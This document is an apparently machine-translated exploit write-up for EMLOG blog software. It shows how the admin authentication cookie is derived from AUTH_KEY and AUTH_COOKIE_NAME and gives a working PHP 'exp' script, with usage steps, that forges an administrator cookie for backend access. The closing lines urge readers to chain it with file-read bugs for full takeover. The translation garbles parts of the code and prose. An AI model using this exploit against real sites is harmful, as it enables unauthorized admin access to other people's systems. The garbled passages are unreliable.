EMLOG background COOKIE Spoofing)

First of all, this should not be a loophole. It is more appropriate to say that he is a BUG. Let's take a look. Because it is quite useful to use it, you must obtain the AUTH_KEY and AUTH_COOKIE_NAME values of the program before it can be used. These two items are randomly generated during installation and stored in config. in php, however, chicken ribs do not mean no harm. After the above two values are obtained, You can freely enter the background as long as the other party does not reinstall them ~~~~ I believe that the uckey of discuz 7.x has a lot of wonderful people! Let's take a look at the key code for emlog cookie verification: PHP code/*** generate logon verification cookie ** @ param int $ user_id user login * @ param int $ expiration Cookie expiration in seconds * @ return string Authentication cookie contents */function generateAuthCookie ($ user_login, $ expiration) {$ key = emHash ($ user_login. '| '. $ expiration); $ hash = hash_hmac ('md5', $ user_login. '| '. $ expiration, $ key); $ cookie = $ user_login. '| '. $ expiration. '| '. $ Hash; return $ cookie;} PHP code/*** Get hash of given string. ** @ param string $ data Plain text to hash * @ return string Hash of $ data */function emHash ($ data) {$ key = AUTH_KEY; // assign the AUTH_KEY value to $ key return hash_hmac ('md5', $ data, $ key ); // generate a Hash value containing the key in HMAC mode. Here, the encryption mode is md5 key. The AUTH_KEY In the config file is encrypted with $ username | $ expiration}. Therefore, the author only keeps encrypting the key. encryption and re-encryption, however, the user name and password are not checked into the database, so... Finally, let's look at the setAuthCookie function to construct the cookie value: PHP code/*** write cookie for login verification ** @ param int $ user_id User ID * @ param bool $ remember Whether to remember the user or not */function setAuthCookie ($ user_login, $ ispersis = false) {if ($ ispersis) {$ expiration = time () + 60*60*24*30*12;} else {$ expiration = null ;} $ auth_cookie_name = AUTH_COOKIE_NAME; $ auth_cookie = generateAuthCookie ($ user_login, $ expira Tion); setcookie ($ auth_cookie_name, $ auth_cookie, $ expiration, '/');} You can see from the code above that this cookie can be fully calculated, cookie value generation exp: PHP Code <? Php $ time = time () + 60*60*24*30*12; $ key = hash_hmac ('md5', 'admin | '. $ time, 'x6gwwug3mdlkidmwxcp9% j6 # bucket'); // This is the key. The admin name is www.2cto.com $ hash = hash_hmac ('md5', 'admin | '. $ time, $ key); // admin indicates the management name to be spoofed $ cookie = 'admin | '. $ time. "| ". $ hash; // admin indicates the management name to be spoofed echo $ cookie; setcookie ("EM_AUTHCOOKIE_ZrMieHk3O56bPNzXjFW4PjuDXMxBUPKk", $ cookie); // This is cookiena Me?> Finally, let's demonstrate how to use it: in config. in the PHP file, find the AUTH_KEY value and the AUTH_COOKIE_NAME value. Here my value is: PHP code // auth key define ('auth _ key', 'x6gwwug3mdlkidmwxcp9% j6 # secret '); // cookie name define ('auth _ COOKIE_NAME ', 'em _ AUTHCOOKIE_ZrMieHk3O56bPNzXjFW4PjuDXMxBUPKk'); so. Replace the related content in exp. My management name is admin by default, so I will not change the management name here ~~ After execution, refresh the background:

I have no technical skills, but I am also a little cainiao, but emlog is indeed small. I have read the code from the past, capable experts can dig a hole in reading files or arbitrary downloads ~~ With this, the second kill will be available.